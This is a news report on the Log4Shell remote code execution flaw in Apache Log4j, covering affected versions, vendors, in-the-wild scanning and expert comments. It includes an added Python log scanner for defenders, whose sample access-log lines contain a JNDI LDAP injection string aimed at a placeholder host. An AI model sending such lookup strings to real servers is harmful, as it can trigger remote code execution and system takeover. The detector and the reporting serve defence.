The Apache Software Foundation has released fixes to contain an actively[1] exploited[2] zero-day vulnerability affecting the widely used Apache Log4j Java-based logging library that could be weaponized to execute malicious code and allow a complete takeover of vulnerable systems.
Tracked as CVE-2021-44228[3] and known by the monikers Log4Shell and LogJam, the issue is an unauthenticated remote code execution (RCE) flaw in any application that uses the open-source utility, and it affects Log4j versions 2.0-beta9 through 2.14.1. The bug has scored a perfect 10 out of 10 in the CVSS rating system, reflecting the severity of the issue.
“An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP[4] servers when message lookup substitution is enabled,” the Apache Foundation said[5] in an advisory. “From Log4j 2.15.0, this behavior has been disabled by default.”
Log4j is used as a logging package in a variety of popular software[6] by a number of manufacturers[7], including Amazon, Apple iCloud, Cisco[8], Cloudflare[9], ElasticSearch, Red Hat[10], Steam, Tesla, Twitter, and video games such as Minecraft[11]. In the case of the latter, attackers have been able to gain RCE on Minecraft servers[12] by simply pasting a specially crafted message into the chat box.
Exploitation can be achieved with a single string of text: if that string is logged via a vulnerable instance of Log4j, it can trigger the application to reach out to a malicious external host, effectively granting the adversary the ability to retrieve a payload from a remote server and execute it locally. The project maintainers credited Chen Zhaojun of Alibaba Cloud Security Team with discovering the issue.
A huge attack surface
“The Apache Log4j zero-day vulnerability is probably the most critical vulnerability we have seen this year,” said Bharat Jogi, senior manager of vulnerabilities and signatures at Qualys. “Log4j is a ubiquitous library used by millions of Java applications for logging error messages. This vulnerability is trivial to exploit.”
Cybersecurity firms BitDefender[13], Cisco Talos[14], Huntress Labs[15], and Sonatype[16] have all confirmed evidence of mass scanning[17] in the wild for vulnerable servers, as well as attacks registered against their honeypot networks, following the availability[18] of a proof-of-concept (PoC[19]) exploit. “This is a low-skilled attack that is extremely simple to execute,” Sonatype’s Ilkka Turunen said.
GreyNoise, likening the flaw to Shellshock[20], said it observed malicious activity[21] targeting the vulnerability commencing on December 9, 2021. Web infrastructure company Cloudflare noted[22] that it blocked roughly 20,000 exploit requests per minute around 6:00 p.m. UTC on Friday, with most of the exploitation attempts originating from Canada, the U.S., the Netherlands, France, and the U.K.
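The scanning and blocking described above comes down to spotting Log4j lookup syntax in request data before, or after, it reaches a vulnerable logger. As an added example that is not part of the article or any vendor's tooling, the following Python scanner flags lines of a web-server access log that carry lookup syntax, rating a `jndi:` lookup (the pattern CVE-2021-44228 abuses) as high and any other `${...}` lookup as medium; the log lines, addresses and host names are constructed.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Log4j 2 message lookups have the form ${prefix:value}; CVE-2021-44228 is
# triggered when a logged string contains a jndi: lookup. No legitimate HTTP
# client sends lookup syntax in a User-Agent or URL, so its mere presence in
# request data is a useful detection signal regardless of the prefix.
LOOKUP_RE = re.compile(r"\$\{[^}]*\}")
JNDI_RE = re.compile(r"jndi\s*:", re.IGNORECASE)


@dataclass
class Finding:
    line_no: int
    severity: str  # "high" for a jndi: lookup, "medium" for other lookup syntax
    snippet: str   # the first lookup found on the line


def classify(text: str) -> Optional[str]:
    """Return a severity for one log line, or None if it has no lookup syntax."""
    if not LOOKUP_RE.search(text):
        return None
    return "high" if JNDI_RE.search(text) else "medium"


def scan_log(lines: List[str]) -> List[Finding]:
    """Scan access-log lines and return one Finding per line with lookup syntax."""
    findings = []
    for no, line in enumerate(lines, start=1):
        severity = classify(line)
        if severity:
            findings.append(Finding(no, severity, LOOKUP_RE.search(line).group(0)))
    return findings


# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:18:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:18:02:12 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"',
    '203.0.113.9 - - [10/Dec/2021:18:02:13 +0000] "GET /?q=${env:HOME} HTTP/1.1" 404 0 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.severity} {f.snippet}")
```

Matching on any lookup syntax rather than only the literal `jndi` prefix is deliberate: the advisory's fix is to disable lookup substitution altogether, so lookup syntax arriving from the network is suspicious whatever it resolves to.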
Given the ease of exploitation and the prevalence of Log4j in enterprise IT and DevOps, in-the-wild attacks[23] aimed at susceptible servers are expected to ramp up in the coming days, making it imperative to address the flaw immediately. Israeli cybersecurity firm Cybereason has also released a fix called “Logout4Shell[24]” that closes the shortcoming by using the vulnerability itself to reconfigure the logger and prevent further exploitation.
“This Log4j (CVE-2021-44228) vulnerability is extremely bad. Millions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string,” security expert Marcus Hutchins said[25] in a tweet.
References
[1] actively (twitter.com)
[2] exploited (www.cert.govt.nz)
[3] CVE-2021-44228 (nvd.nist.gov)
[4] LDAP (en.wikipedia.org)
[5] said (logging.apache.org)
[6] popular software (github.com)
[7] number of manufacturers (www.lunasec.io)
[8] Cisco (tools.cisco.com)
[9] Cloudflare (blog.cloudflare.com)
[10] Red Hat (access.redhat.com)
[11] Minecraft (twitter.com)
[12] gain RCE on Minecraft servers (twitter.com)
[13] BitDefender (www.bitdefender.com)
[14] Cisco Talos (blog.talosintelligence.com)
[15] Huntress Labs (www.huntress.com)
[16] Sonatype (blog.sonatype.com)
[17] mass scanning (twitter.com)
[18] availability (github.com)
[19] PoC (twitter.com)
[20] Shellshock (en.wikipedia.org)
[21] observed malicious activity (www.greynoise.io)
[22] noted (blog.cloudflare.com)
[23] in-the-wild attacks (www.greynoise.io)
[24] Logout4Shell (github.com)
[25] said (twitter.com)
Read more https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html